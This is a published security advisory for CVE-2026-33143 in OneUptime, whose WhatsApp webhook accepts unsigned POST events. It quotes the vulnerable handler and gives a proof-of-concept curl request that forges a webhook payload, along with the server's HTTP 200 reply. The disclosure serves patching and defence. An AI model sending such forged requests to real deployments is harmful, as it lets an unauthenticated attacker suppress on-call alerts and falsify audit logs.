GHSA-G5PH-F57V-MWJC

Vulnerability from github – Published: 2026-03-18 17:25 – Updated: 2026-03-20 21:33
VLAI?
Summary
OneUptime WhatsApp Webhook Missing Signature Verification
Details

Summary

The WhatsApp POST webhook handler (/notification/whatsapp/webhook) processes incoming status update events without verifying the Meta/WhatsApp X-Hub-Signature-256 HMAC signature, allowing any unauthenticated attacker to send forged webhook payloads that manipulate notification delivery status records, suppress alerts, and corrupt audit trails. The codebase already implements proper signature verification for Slack webhooks.

Details

Vulnerable code — App/FeatureSet/Notification/API/WhatsApp.ts lines 372-430:

router.post(
  "/webhook",
  async (req: ExpressRequest, res: ExpressResponse, next: NextFunction) => {
    try {
      const body: JSONObject = req.body as JSONObject;
      // NO signature verification! No X-Hub-Signature-256 check!

      if (
        (body["object"] as string | undefined) !== "whatsapp_business_account"
      ) {
        return Response.sendEmptySuccessResponse(req, res);
      }

      const entries: JSONArray | undefined = body["entry"] as JSONArray | undefined;
      // ... processes entries and updates WhatsApp log status records

Compare with the Slack webhook which correctly validates signatures:

Common/Server/Middleware/SlackAuthorization.ts line 58:

const isValid = crypto.timingSafeEqual(
    Buffer.from(computedSignature),
    Buffer.from(slackSignature)
);

The WhatsApp GET webhook correctly validates the verify token — only the POST handler (which processes actual events) is missing signature verification.

No existing CVEs cover webhook signature verification issues in OneUptime. The closest is GHSA-cw6x-mw64-q6pv (WhatsApp Resend Verification Auth Bypass), which is about a different WhatsApp-related authorization issue.

PoC

Environment: OneUptime v10.0.23 via docker compose up (default configuration)

# Forge a delivery status update for any WhatsApp notification — no auth, no signature
curl -sv -X POST http://TARGET:8080/api/notification/whatsapp/webhook \
  -H "Content-Type: application/json" \
  -d '{
    "object": "whatsapp_business_account",
    "entry": [{
      "id": "FAKE_WABA_ID",
      "changes": [{
        "value": {
          "messaging_product": "whatsapp",
          "metadata": {
            "display_phone_number": "+15550000000",
            "phone_number_id": "FAKE_PHONE_ID"
          },
          "messages": [{
            "from": "15551234567",
            "id": "wamid.FAKE",
            "timestamp": "1234567890",
            "text": {"body": "INJECTED_MESSAGE"},
            "type": "text"
          }]
        },
        "field": "messages"
      }]
    }]
  }'

Docker validation (oneuptime/app:release, APP_VERSION=10.0.23):

< HTTP/1.1 200 OK
{}
  • Fake WhatsApp webhook payload accepted with HTTP 200
  • No X-Hub-Signature-256 header provided — no signature verification at all
  • Attacker can inject arbitrary inbound WhatsApp messages and forge delivery status updates

Impact

Any unauthenticated remote attacker can forge WhatsApp webhook events:

  • False delivery status: Mark undelivered WhatsApp notifications as "delivered", hiding delivery failures from administrators
  • Alert suppression: Critical on-call notifications that failed to deliver appear successful, preventing escalation
  • Log manipulation: WhatsApp notification logs updated with forged status data, corrupting audit trails
  • Incident response disruption: During active incidents, forging "delivered" statuses prevents the system from retrying failed notification deliveries
Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "oneuptime"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "10.0.34"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-33143"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-345"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-18T17:25:02Z",
    "nvd_published_at": "2026-03-20T21:17:14Z",
    "severity": "HIGH"
  },
  "details": "### Summary\n\nThe WhatsApp POST webhook handler (`/notification/whatsapp/webhook`) processes incoming status update events without verifying the Meta/WhatsApp `X-Hub-Signature-256` HMAC signature, allowing any unauthenticated attacker to send forged webhook payloads that manipulate notification delivery status records, suppress alerts, and corrupt audit trails. The codebase already implements proper signature verification for Slack webhooks.\n\n### Details\n\n**Vulnerable code \u2014 `App/FeatureSet/Notification/API/WhatsApp.ts` lines 372-430:**\n```typescript\nrouter.post(\n  \"/webhook\",\n  async (req: ExpressRequest, res: ExpressResponse, next: NextFunction) =\u003e {\n    try {\n      const body: JSONObject = req.body as JSONObject;\n      // NO signature verification! No X-Hub-Signature-256 check!\n\n      if (\n        (body[\"object\"] as string | undefined) !== \"whatsapp_business_account\"\n      ) {\n        return Response.sendEmptySuccessResponse(req, res);\n      }\n\n      const entries: JSONArray | undefined = body[\"entry\"] as JSONArray | undefined;\n      // ... processes entries and updates WhatsApp log status records\n```\n\nCompare with the Slack webhook which correctly validates signatures:\n\n**`Common/Server/Middleware/SlackAuthorization.ts` line 58:**\n```typescript\nconst isValid = crypto.timingSafeEqual(\n    Buffer.from(computedSignature),\n    Buffer.from(slackSignature)\n);\n```\n\nThe WhatsApp GET webhook correctly validates the verify token \u2014 only the POST handler (which processes actual events) is missing signature verification.\n\nNo existing CVEs cover webhook signature verification issues in OneUptime. The closest is GHSA-cw6x-mw64-q6pv (WhatsApp Resend Verification Auth Bypass), which is about a different WhatsApp-related authorization issue.\n\n### PoC\n\n**Environment:** OneUptime v10.0.23 via `docker compose up` (default configuration)\n\n```bash\n# Forge a delivery status update for any WhatsApp notification \u2014 no auth, no signature\ncurl -sv -X POST http://TARGET:8080/api/notification/whatsapp/webhook \\\n  -H \"Content-Type: application/json\" \\\n  -d \u0027{\n    \"object\": \"whatsapp_business_account\",\n    \"entry\": [{\n      \"id\": \"FAKE_WABA_ID\",\n      \"changes\": [{\n        \"value\": {\n          \"messaging_product\": \"whatsapp\",\n          \"metadata\": {\n            \"display_phone_number\": \"+15550000000\",\n            \"phone_number_id\": \"FAKE_PHONE_ID\"\n          },\n          \"messages\": [{\n            \"from\": \"15551234567\",\n            \"id\": \"wamid.FAKE\",\n            \"timestamp\": \"1234567890\",\n            \"text\": {\"body\": \"INJECTED_MESSAGE\"},\n            \"type\": \"text\"\n          }]\n        },\n        \"field\": \"messages\"\n      }]\n    }]\n  }\u0027\n```\n\n**Docker validation (oneuptime/app:release, APP_VERSION=10.0.23):**\n```\n\u003c HTTP/1.1 200 OK\n{}\n```\n\n- Fake WhatsApp webhook payload accepted with HTTP 200\n- No `X-Hub-Signature-256` header provided \u2014 no signature verification at all\n- Attacker can inject arbitrary inbound WhatsApp messages and forge delivery status updates\n\n### Impact\n\nAny unauthenticated remote attacker can forge WhatsApp webhook events:\n\n- **False delivery status:** Mark undelivered WhatsApp notifications as \"delivered\", hiding delivery failures from administrators\n- **Alert suppression:** Critical on-call notifications that failed to deliver appear successful, preventing escalation\n- **Log manipulation:** WhatsApp notification logs updated with forged status data, corrupting audit trails\n- **Incident response disruption:** During active incidents, forging \"delivered\" statuses prevents the system from retrying failed notification deliveries",
  "id": "GHSA-g5ph-f57v-mwjc",
  "modified": "2026-03-20T21:33:33Z",
  "published": "2026-03-18T17:25:02Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/OneUptime/oneuptime/security/advisories/GHSA-g5ph-f57v-mwjc"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33143"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/OneUptime/oneuptime"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "OneUptime WhatsApp Webhook Missing Signature Verification"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.


Loading…

Loading…

Loading…

Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.


Loading…

Detection rules are retrieved from Rulezet.

Loading…

Loading…